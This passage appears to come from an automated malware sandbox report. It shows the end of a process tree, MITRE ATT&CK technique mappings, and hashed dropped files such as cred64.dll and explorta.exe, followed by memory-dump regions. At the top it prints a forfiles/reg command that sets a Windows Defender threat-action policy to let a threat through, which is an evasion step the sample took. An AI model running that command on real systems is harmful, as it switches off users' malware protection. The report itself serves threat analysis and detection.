    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:6540
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:3900
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:2508

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
PID:7108

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Are.docx

Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\Users\Admin\1000021002\76c1f15004.exe

Filesize
1.1MB

MD5
9f0f1373632881d91954fa6ecae9e2ce

SHA1
e940176483a3a9acb9756e623fd9bf024445abd3

SHA256
266457fc801907bca6c32fda8cbba7a063d5aa69d3bd0185b761a54cffbfd498

SHA512
a96bd2c31543fcc62c33e6afc0eecd9ff5a47e8c9d4bbb26c0df8c3b31a78702845fb65ca44efcdd2e9f98b0a99f5800504f7f075b74094119a08bb5fe4c7519

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
0d2f3dd414bcff5ce37bde1a5364119d

SHA1
8cbaa35b4621ff9a98cc8f758d624fae33425e8c

SHA256
7f07d9c5fedd2206f229e4883bde6b86b0490b65286ee423d23a526eca412d11

SHA512
494aa55a182d42b1b7a03bdaf572b9842be3e07180fa62d203f284ff79b06008c2dfd583ba3a8c85e042fe504c8bfdd0954626106a7172cf397e3a86246c3ee3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
264B

MD5
c015439c7a392945b83dd5f98d3934f7

SHA1
e95b7fd2429f7f12a199f29c915dac8712b0f3dd

SHA256
71a511c6a105f863acbcda07da23c1cc7772dab9113c4a453cf40c3297cff056

SHA512
c83a0e782685ea9b96c2e906de7c4c9eaa858413a09995d531b03354a48af98768dde40254d036a88f8267ff480db2640d0f255b9c749c53219adc3d03e9c84c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
524B

MD5
8242567718306f8798f5dc3076335424

SHA1
90156d9fa3f935b6a23460cef9bb0f6b3fd4ca37

SHA256
e558cc52ba3b4308e43578dd27ab5d569e70cbcde1d23247214d8218808acac4

SHA512
dc17b8b10127a858b8cba18de11888b5bc199a66d389567c8675d64ed36727e595ced2867507843afa556f7417eab9f2e4cfba25097b2b3a5e5a79c7d91ecb95

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
5a54011246632e6c6c4b38f07fb602ca

SHA1
1fc8a25e709a59da1c54ce60e51f0ff676946c4b

SHA256
92380257da5ba22e9f812ce4825bf42c561a7c0be2bf621d62c63c2292079f6d

SHA512
0125bbae0717dd5ca1533492c3937c02dce4354796cdde1d148c3bf7366a8376b055ecf60271859c146cd04ce81a1cc4a06f0a44643d2757fb3b85d04e2b02a0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
b5f1554d3c0d14300fefea3dc03ed66e

SHA1
f3f91fe96727b6d8cb0223960646ebaa24c45226

SHA256
e99951722f975fdd7db0dfe7bdfbfeadd563dda89cb7bae532ae36ff88563bbf

SHA512
f5a3982523113a111773ed8491594bf73cc67982ef935c01973544d985d6b98e4cad13d20a23cb26d89c01720feea89cd876b2dad88ec9f34cd7eb31d24f67bf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
54b3381b81269197f84848b1dab0a020

SHA1
a9784b1f798aa2c685f87e8dda54e2b3a26eed6a

SHA256
d6276a87bea9095c7f35471790c8a05bea75b2c01d90685062ddfbe4a069b00b

SHA512
c594260c924a5e98aca501dbf7387a1a1d95213f9fb75575b64f66b89a02ef751e43d05395d634ecd4908d0951dbeaaf8f9b1aadb1ec4c6385dadb6ea5fbd563

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
305b32930f68f20fdacd8f02779584c9

SHA1
556abd4fcee9670cd9f11fe1a1403f1256db31ad

SHA256
57e94d4ab3d4afada500b2f70b26790d4f496dbd7a35e6635c6c30fd2cbd62b2

SHA512
dab600cab3235747ac8628a03449f05cf5f32464b03dfaa2d1867b6e8ac4aa128210fcfa7953ef30e873122a003e550edde19a523f76f6b6c2bd1692dbf47331

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
152KB

MD5
252bc231c11ca3f23afa4c29522f1e48

SHA1
017c5673d200bc6b45d663dace5fc6b10f37f9a4

SHA256
66b8aaeac6f7e85ae7249b54de8e558cb686edeb04f97ffc9101c591d864d70c

SHA512
6b5083e5b900652972092e3f5ce2529a9cb09d488c1a7d3d0c6928550e1d8509ff9758b9d0842447190099d8fb858f7d8eeede1518aa0c052d7680f21e778949

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
152KB

MD5
6347383623976a1ca90762c288d63216

SHA1
d19f7e26bc5297d94bedbb236aa3839a6c26e592

SHA256
a8cdf268f154e682b93e130090b7ea875491cddf89c769060f0239ce03bf996f

SHA512
33829af48a63f872c13c0d524d187ea4bad3e6f5185d97c3bfa75675e312d0c3b9054165efa5506bd3e17bd9354c4a808d0e293dbc2dc69ddbc3bf62891fd0a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe

Filesize
1.8MB

MD5
579ae8085e262693a307377c3334263d

SHA1
bcdc68ea0e02945865aa8de72a5490bbe813452d

SHA256
d72cb2d29f119bab0150627922b52f989ea30e884e188af803d2b0b2de0712b4

SHA512
0c0f7bc4aace7ee7f5431d966be1bb012e4eabe8658b9c97ad09db3808fe93f3fc41f57ff78f38484fde574d7836080d027b7e73cb863b576e36a48e3e64961c

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000020001\cd0a04cbf6.exe

Filesize
2.0MB

MD5
0bd8b2ebf9a1bc6907c841eec9be6c88

SHA1
f6c38ecca4099515dfee5cd6c50367b1188a4d41

SHA256
f9cf92022ada8247d3b8225a3445a2a0aa3e1be46ab5e81d152efeb6f1260093

SHA512
868f04da6839d2f20a6bc252d6712743c725fa6c71ee7c18587358726154aa1722db0223880add47e7cebd39c18ea097492535703be1813591620e8c29b07c74

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe

Filesize
321KB

MD5
1c7d0f34bb1d85b5d2c01367cc8f62ef

SHA1
33aedadb5361f1646cffd68791d72ba5f1424114

SHA256
e9e09c5e5d03d21fca820bd9b0a0ea7b86ab9e85cdc9996f8f1dc822b0cc801c

SHA512
53bf85d2b004f69bbbf7b6dc78e5f021aba71b6f814101c55d3bf76e6d058a973bc58270b6b621b2100c6e02d382f568d1e96024464e8ea81e6db8ccd948679d

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe

Filesize
304KB

MD5
8510bcf5bc264c70180abe78298e4d5b

SHA1
2c3a2a85d129b0d750ed146d1d4e4d6274623e28

SHA256
096220045877e456edfea1adcd5bf1efd332665ef073c6d1e9474c84ca5433f6

SHA512
5ff0a47f9e14e22fc76d41910b2986605376605913173d8ad83d29d85eb79b679459e2723a6ad17bc3c3b8c9b359e2be7348ee1c21fa2e8ceb7cc9220515258d

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000073001\swiiii.exe

Filesize
158KB

MD5
586f7fecacd49adab650fae36e2db994

SHA1
35d9fb512a8161ce867812633f0a43b042f9a5e6

SHA256
cf88d499c83da613ad5ccd8805822901bdc3a12eb9b15804aeff8c53dc05fc4e

SHA512
a44a2c99d18509681505cf70a251baf2558030a8648d9c621acc72fafcb2f744e3ef664dfd0229baf7c78fb72e69f5d644c755ded4060dcafa7f711d70e94772

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe

Filesize
405KB

MD5
4c03ddbf5fe9e55346e426b78c9a9b2c

SHA1
e8ad3b30d021822fe4c9f6d9c3645bd712224ee7

SHA256
93ab0c21c47f274b48753f772002789cf90e81dc4145281ef5862ea94530decb

SHA512
9abc493c5e467667890933b0663370797734fb625cc0fa80f59195606315bbf77c4f4882b20f5c4b1f999dbfb397bacd65c992ef071b21a076b056a55431e325

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe

Filesize
564KB

MD5
f15a9cfa3726845017a7f91abe0a14f7

SHA1
5540ae40231fe4bf97e59540033b679dda22f134

SHA256
2dec75328413d4c278c119db42920fb183a88a5398d56ecc80c8cc74fba13071

SHA512
1c2af9608736ad6a02d093f769fe5ec5a06cb395a639e021d4ee3f6c46cebc8c101e7db1064984f801ad3bee65d81b95fe6e2e60c0ec949bb172ba9c455b9869

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe

Filesize
2.7MB

MD5
31841361be1f3dc6c2ce7756b490bf0f

SHA1
ff2506641a401ac999f5870769f50b7326f7e4eb

SHA256
222393a4ab4b2ae83ca861faee6df02ac274b2f2ca0bed8db1783dd61f2f37ee

SHA512
53d66fa19e8db360042dadc55caaa9a1ca30a9d825e23ed2a58f32834691eb2aaaa27a4471e3fc4d13e201accc43160436ed0e9939df1cc227a62a09a2ae0019

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe

Filesize
4.2MB

MD5
0f52e5e68fe33694d488bfe7a1a71529

SHA1
11d7005bd72cb3fd46f24917bf3fc5f3203f361f

SHA256
efd29c35766c607aa15d1cb83dec625739791b1616ad37d5b47e78cdb8a42ca8

SHA512
238fbb1c04eef2f2005cb7abf0223e3cd062d9d2840966292e19dcaa495609e134a0bdc35389ae9925ecfc787a13772d3ac7b29058579f702bc849dd0343c400

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe

Filesize
418KB

MD5
0099a99f5ffb3c3ae78af0084136fab3

SHA1
0205a065728a9ec1133e8a372b1e3864df776e8c

SHA256
919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226

SHA512
5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe

Filesize
1.5MB

MD5
d1046f80374e3c0c257fe2380eeef4ff

SHA1
bf58835dd0c0a4eb7ca7e97508a860c7e57ec66a

SHA256
fea44eee374433c97489278b66a9a2f0b8dd5cb9e2aaa8767b8043c02aba6d1f

SHA512
a3095cf8e6bd9ced2075fa9e322c6471afea8eb69128633982ae15056ac77e7a2f4f4a96a300250c0bd63693fcf3ae793d20699c9c49ad22f38963ee07da98c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSFD1D.tmp\Install.exe

Filesize
6.4MB

MD5
220a02a940078153b4063f42f206087b

SHA1
02fc647d857573a253a1ab796d162244eb179315

SHA256
7eb93d93b03447a6bafd7e084305d41bf9780bd415cb2e70020952d06f3d7b60

SHA512
42ac563a7c28cbf361bfb150d5469f0278ab87ce445b437eef8425fb779689d70230b550815f30f9db2909c1ba0dd015b172dfe3e718d26706856f4cb0eeeeaa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tmp9C40.tmp

Filesize
2KB

MD5
1420d30f964eac2c85b2ccfe968eebce

SHA1
bdf9a6876578a3e38079c4f8cf5d6c79687ad750

SHA256
f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9

SHA512
6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c3fa1mho.usd.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\enpl.exe

Filesize
803KB

MD5
9ebc26514cf9f5811a6538d1446d33da

SHA1
a428d7fa3f9e9be4977fbacd8b63b99cc494d297

SHA256
0dc7dcb7aee52ecb97e675245cfa0ed41766a30a8ff4cc58f2cc93c996d0371f

SHA512
52e65b8d9ca40b47d012c741ad52ed6b0f776b8af971cedfe891c783ea0e5cc4c67042445ee17cd0a77ae14ce6af9d4a59904100aa734a485685c4181b15a6e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

Filesize
2KB

MD5
863296f764f906de2b8092933faeae5e

SHA1
de1bdb6695eb529124812f5c4c9cd75c5a2e6f84

SHA256
cdbfb9ff4c4787942f0a1f2f3915c5365d3d644e80279ca6dd0614bac99f7a42

SHA512
38444049bb32f2958bfe1ed0d06a7eaf4f9767c80d33dd7127c000a7abe971feeb65ed8b8e079aa0cb8a7164a0b6c406184fa9cf6bf6068a29532be785b686af

Download Submit
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

Filesize
3KB

MD5
1dc44e0e75c38fa55f332f05c4dae14d

SHA1
4e853e00286759418e5ce7f8b990e6a6f56f418f

SHA256
47b98366cd5eac3531bcc6d17c8ffbcfcd4e58d840059001aa84a9d49f80c930

SHA512
387009e0b5476a3c93bd6ac50d3e139b9728a4f12bc2295a3b3e78bdec0ec96ac0933c06c471651267dfe6daba7f58a85fc7e83cda7eadf1119303ea5d135319

Download Submit
C:\Users\Admin\AppData\Local\Temp\u4os.0.exe

Filesize
230KB

MD5
2c1f5406f854370921a90cc0f3f11145

SHA1
6969f52309b66f6a09f08c0e67db4956df150346

SHA256
79678293aad51fc96c947e496351048672ece528457daab0cfc93b35c16d1ab9

SHA512
6104eaa7a60a29b5962b3cff8cde7b7c237ced82f11a7c581df30725d1d5aec187b30ebbe7d6d61f45964cf4f70ea605c9b20c504e5dddc2451f440ecb50e2ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\u4os.1.exe

Filesize
4.6MB

MD5
397926927bca55be4a77839b1c44de6e

SHA1
e10f3434ef3021c399dbba047832f02b3c898dbd

SHA256
4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7

SHA512
cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

Download Submit
C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll

Filesize
109KB

MD5
726cd06231883a159ec1ce28dd538699

SHA1
404897e6a133d255ad5a9c26ac6414d7134285a2

SHA256
12fef2d5995d671ec0e91bdbdc91e2b0d3c90ed3a8b2b13ddaa8ad64727dcd46

SHA512
9ea82e7cb6c6a58446bd5033855947c3e2d475d2910f2b941235e0b96aa08eec822d2dd17cc86b2d3fce930f78b799291992408e309a6c63e3011266810ea83e

Download Submit
C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll

Filesize
1.2MB

MD5
15a42d3e4579da615a384c717ab2109b

SHA1
22aeedeb2307b1370cdab70d6a6b6d2c13ad2301

SHA256
3c97bb410e49b11af8116feb7240b7101e1967cae7538418c45c3d2e072e8103

SHA512
1eb7f126dccc88a2479e3818c36120f5af3caa0d632b9ea803485ee6531d6e2a1fd0805b1c4364983d280df23ea5ca3ad4a5fca558ac436efae36af9b795c444

Download Submit
C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe

Filesize
304KB

MD5
0c582da789c91878ab2f1b12d7461496

SHA1
238bd2408f484dd13113889792d6e46d6b41c5ba

SHA256
a6ab532816fbb0c9664c708746db35287aaa85cbb417bef2eafcd9f5eaf7cf67

SHA512
a1b7c5c13462a7704ea2aea5025d1cb16ddd622fe1e2de3bbe08337c271a4dc8b9be2eae58a4896a7df3ad44823675384dbc60bdc737c54b173909be7a0a086a

Download Submit
C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe

Filesize
750KB

MD5
20ae0bb07ba77cb3748aa63b6eb51afb

SHA1
87c468dc8f3d90a63833d36e4c900fa88d505c6d

SHA256
daf6ae706fc78595f0d386817a0f8a3a7eb4ec8613219382b1cbaa7089418e7d

SHA512
db315e00ce2b2d5a05cb69541ee45aade4332e424c4955a79d2b7261ab7bd739f02dc688224f031a7a030c92fa915d029538e236dbd3c28b8d07d1265a52e5b2

Download Submit
C:\Users\Admin\Desktop\Microsoft Edge.lnk

Filesize
2KB

MD5
da75f2edd4761d68da4163ff004e2091

SHA1
688ab104a85d3e160ca753ec4ed04cc52ab04a31

SHA256
1f375fde7ee0fde1775e3e48ca17ccff7a54e49cf84f37ae09d03c9ed1e83520

SHA512
5af78fcb2b65d0c7bd41d5f906652a00ad416583b916c79681d723c777cbb5da6e5cb0bf28eaa1012fbc8a227065a6305d7a07daccac9ae558908cde30e555d8

Download Submit
C:\Users\Admin\Pictures\3rc2RLbt0QnRe3wK5yVJOB5Q.exe

Filesize
372KB

MD5
2fe6a99d5b9a11d0ad344ab3ec2cefd0

SHA1
9812465bc9f90510f4e6fc70f5a1b7d3c1855a84

SHA256
d5c6b91854155aa588b8f8b4e6fde8ebd63a8242e8c5155b596af43ed4b18bfc

SHA512
069b42e1ad8d1d6573bc3e001605b4f5957bcdd1467734f32f9e04c4b8e0f6be03f244caa3cf9ac16c6fc201e6aa37c0fbede6592bade8f049a84f1a7d0dd40b

Download Submit
C:\Users\Admin\Pictures\9jwfgRbC93y6EDVIWJbqkK0O.exe

Filesize
5.5MB

MD5
26193ade61357f8be316a489dfbe08c7

SHA1
12f618f5c00f81477f7dfbb513d88c66166e1aed

SHA256
cd08d7d53e4206301c103aa6db8cf423e289679a203973a0c7c13404e7490e48

SHA512
881f6cbd27adf3f038a6ae2c9ee20af97ba0502c775d95bbc47d1a605691bdc3158129fa6123b9256202d34d40e48e90a1e7863d0d1c03d0e3672bada6c61c9a

Download Submit
C:\Users\Admin\Pictures\9tHLKBAbzPXGwiEYlXt3midc.exe

Filesize
7KB

MD5
77f762f953163d7639dff697104e1470

SHA1
ade9fff9ffc2d587d50c636c28e4cd8dd99548d3

SHA256
d9e15bb8027ff52d6d8d4e294c0d690f4bbf9ef3abc6001f69dcf08896fbd4ea

SHA512
d9041d02aaca5f06a0f82111486df1d58df3be7f42778c127ccc53b2e1804c57b42b263cc607d70e5240518280c7078e066c07dec2ea32ec13fb86aa0d4cb499

Download Submit
C:\Users\Admin\Pictures\Ixl4oRZ5ssjR15YA9xS7hYbf.exe

Filesize
4.2MB

MD5
658998bb90b3c3a7f16eee2958a8d7e5

SHA1
b051df0b4b957c922dab1f615f2c9e58b6e90978

SHA256
795ce62d9ee031325deb9eaf7139eed3fd8a95ad614008eddcc58eda1d1898ca

SHA512
7df9199993e9e296cb998d9e52224f2a868f3e91f4720d8e63e153c8589f7031378deb4472aa1262a6137275202477b2d29e8989887f1e0ea84d1a4559d8a4c8

Download Submit
C:\Users\Admin\Pictures\YuxvMHd8veUMYWJ75HoYGoEE.exe

Filesize
6.2MB

MD5
5638d57a305af6d979c2ff2f7634605a

SHA1
d411fe7f10fe6488f4bbcc52704146d124177f9b

SHA256
bc912349a4c6e0700e5709eed23eda3f1e5375c973b17de0c77a78398ca5db16

SHA512
acea97ee145a44fecd8dd403f4045ddfb1a31d1a59dc5b700d564640c4fe1fecdf7f9efdb9fb996c52e7a5957bf09e12ba2852c9abd56ff2e8382283f648a990

Download Submit
C:\Users\Admin\Pictures\oR5XYGuEOu0eN2kqrYnCF36U.exe

Filesize
4.2MB

MD5
599da1b9967100593791bea9566b6e62

SHA1
a32a492570c55d3bdfdcc68ea2fd70d3b75576dc

SHA256
4d8367357eac11505728c9c051552d8654e49d4dd91628223f60b090027cb27e

SHA512
2b96fc9b73f84263de4de9c147ee89dc9c37fb2e4f922f46178e98833704bf8cba73d5e2da94ff82e262204c1ae484b73f1ec3a4c8ee88c855e0d0ddb8d11c10

Download Submit
C:\Users\Public\Desktop\Google Chrome.lnk

Filesize
2KB

MD5
d3184af029962747d35316239c019738

SHA1
16504e5fdb1dd2de0d741dc43ecc5cf79e1bcf39

SHA256
2f358d38ae55d143b2d94b83a44c3fe756af04c5b1020d6b701f2caeb7f3fc05

SHA512
313c7cdc7b120ff1f05831844052a58061512fe1e7aeb2b94fc156b4dfff8116403aac16ad8627c711e0fcf39bf184b41690e43eb3dc08d866716888778d428e

Download Submit
C:\Windows\System32\GroupPolicy\gpt.ini

Filesize
127B

MD5
8ef9853d1881c5fe4d681bfb31282a01

SHA1
a05609065520e4b4e553784c566430ad9736f19f

SHA256
9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2

SHA512
5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

Download Submit
memory/468-119-0x0000000000E70000-0x0000000001316000-memory.dmp

Filesize
4.6MB

Download
memory/468-737-0x0000000000E70000-0x0000000001316000-memory.dmp

Filesize
4.6MB

Download
memory/552-270-0x0000000000B70000-0x0000000000B9E000-memory.dmp

Filesize
184KB

Download
memory/748-864-0x0000000000520000-0x0000000000B8E000-memory.dmp

Filesize
6.4MB

Download
memory/1020-922-0x000000001DE10000-0x000000001DE86000-memory.dmp

Filesize
472KB

Download
memory/1020-1021-0x000000001EC90000-0x000000001F1B8000-memory.dmp

Filesize
5.2MB

Download
memory/1020-923-0x000000001B710000-0x000000001B72E000-memory.dmp

Filesize
120KB

Download
memory/1020-1020-0x000000001E590000-0x000000001E752000-memory.dmp

Filesize
1.8MB

Download
memory/1020-898-0x000000001DA50000-0x000000001DA8C000-memory.dmp

Filesize
240KB

Download
memory/1020-897-0x000000001C260000-0x000000001C272000-memory.dmp

Filesize
72KB

Download
memory/1020-693-0x00000000006E0000-0x00000000007A0000-memory.dmp

Filesize
768KB

Download
memory/1020-866-0x000000001D940000-0x000000001DA4A000-memory.dmp

Filesize
1.0MB

Download
memory/1172-961-0x000000006F5D0000-0x000000006F61C000-memory.dmp

Filesize
304KB

Download
memory/1172-972-0x0000000007820000-0x000000000783E000-memory.dmp

Filesize
120KB

Download
memory/1172-924-0x0000000007180000-0x00000000071C4000-memory.dmp

Filesize
272KB

Download
memory/1172-956-0x0000000007CA0000-0x000000000831A000-memory.dmp

Filesize
6.5MB

Download
memory/1172-973-0x0000000007840000-0x00000000078E3000-memory.dmp

Filesize
652KB

Download
memory/1172-1072-0x0000000007AA0000-0x0000000007AA8000-memory.dmp

Filesize
32KB

Download
memory/1172-984-0x0000000007930000-0x000000000793A000-memory.dmp

Filesize
40KB

Download
memory/1172-962-0x000000006B2A0000-0x000000006B5F4000-memory.dmp

Filesize
3.3MB

Download
memory/1172-1019-0x0000000007950000-0x0000000007961000-memory.dmp

Filesize
68KB

Download
memory/1172-1071-0x0000000007AB0000-0x0000000007ACA000-memory.dmp

Filesize
104KB

Download
memory/1172-960-0x00000000077E0000-0x0000000007812000-memory.dmp

Filesize
200KB

Download
memory/1172-1039-0x00000000079C0000-0x00000000079D4000-memory.dmp

Filesize
80KB

Download
memory/1172-1038-0x00000000079B0000-0x00000000079BE000-memory.dmp

Filesize
56KB

Download
memory/1212-206-0x0000000000400000-0x000000000044C000-memory.dmp

Filesize
304KB

Download
memory/1212-208-0x0000000000400000-0x000000000044C000-memory.dmp

Filesize
304KB

Download
memory/1688-106-0x00000000005D0000-0x0000000000BF9000-memory.dmp

Filesize
6.2MB

Download
memory/1688-712-0x00000000005D0000-0x0000000000BF9000-memory.dmp

Filesize
6.2MB

Download
memory/1688-113-0x00000000005D0000-0x0000000000BF9000-memory.dmp

Filesize
6.2MB

Download
memory/1688-112-0x00000000005D0000-0x0000000000BF9000-memory.dmp

Filesize
6.2MB

Download
memory/1688-123-0x00000000005D0000-0x0000000000BF9000-memory.dmp

Filesize
6.2MB

Download
memory/1688-110-0x00000000005D0000-0x0000000000BF9000-memory.dmp

Filesize
6.2MB

Download
memory/1688-111-0x00000000005D0000-0x0000000000BF9000-memory.dmp

Filesize
6.2MB

Download
memory/1688-122-0x00000000005D0000-0x0000000000BF9000-memory.dmp

Filesize
6.2MB

Download
memory/1688-120-0x00000000005D0000-0x0000000000BF9000-memory.dmp

Filesize
6.2MB

Download
memory/1688-121-0x00000000005D0000-0x0000000000BF9000-memory.dmp

Filesize
6.2MB

Download
memory/2112-1-0x0000000000900000-0x0000000000DE0000-memory.dmp

Filesize
4.9MB

Download
memory/2112-0-0x0000000000900000-0x0000000000DE0000-memory.dmp

Filesize
4.9MB

Download
memory/2112-2-0x0000000000900000-0x0000000000DE0000-memory.dmp

Filesize
4.9MB

Download
memory/2112-8-0x0000000000900000-0x0000000000DE0000-memory.dmp

Filesize
4.9MB

Download
memory/2112-3-0x0000000000900000-0x0000000000DE0000-memory.dmp

Filesize
4.9MB

Download
memory/2112-4-0x0000000000900000-0x0000000000DE0000-memory.dmp

Filesize
4.9MB

Download
memory/2112-5-0x0000000000900000-0x0000000000DE0000-memory.dmp

Filesize
4.9MB

Download
memory/2112-6-0x0000000000900000-0x0000000000DE0000-memory.dmp

Filesize
4.9MB

Download
memory/2112-7-0x0000000000900000-0x0000000000DE0000-memory.dmp

Filesize
4.9MB

Download
memory/2112-21-0x0000000000900000-0x0000000000DE0000-memory.dmp

Filesize
4.9MB

Download
memory/2632-650-0x0000000000AC0000-0x0000000000FA0000-memory.dmp

Filesize
4.9MB

Download
